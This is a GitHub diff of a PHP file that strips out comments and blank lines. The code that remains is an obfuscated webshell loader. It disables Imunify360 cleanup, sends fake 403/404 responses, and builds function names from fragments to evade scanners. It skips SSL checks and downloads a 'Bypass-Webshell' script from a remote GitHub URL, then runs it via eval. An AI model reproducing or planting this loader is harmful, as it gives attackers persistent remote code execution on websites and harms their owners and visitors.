File tree Expand file tree Collapse file tree 1 file changed +0
-6
lines changed
Expand file tree Collapse file tree 1 file changed +0
-6
lines changed Original file line number Diff line number Diff line change 44header ('X-Powered-By: none ' );
55header ('Content-Type: text/html; charset=UTF-8 ' );
66ini_set ('lsapi_backend_off ' , '1 ' );
7-
8- // Mengatur kode respons HTTP
97http_response_code (403 );
108ini_set ("imunify360.cleanup_on_restore " , false );
119http_response_code (404 );
12-
13- // Mengambil konten dari URL
1410 function imunify ($ url )
1511 {
1612 $ fpn = "f " ."o " ."p " ."e " ."n " ;
@@ -24,7 +20,6 @@ function imunify($url)
2420 curl_setopt ($ conn , CURLOPT_USERAGENT , "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 " );
2521 curl_setopt ($ conn , CURLOPT_SSL_VERIFYPEER , 0 );
2622 curl_setopt ($ conn , CURLOPT_SSL_VERIFYHOST , 0 );
27-
2823 $ urls = $ cexec ($ conn );
2924 curl_close ($ conn );
3025 } elseif (function_exists ($ fgt )) {
@@ -38,7 +33,6 @@ function imunify($url)
3833 }
3934 return $ urls ;
4035 }
41-
4236 $ secure = imunify ('https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/refs/heads/main/haxorsec-bypasser.php ' );
4337 eval ('?> ' . $ secure );
4438?>
You can’t perform that action at this time.
0 commit comments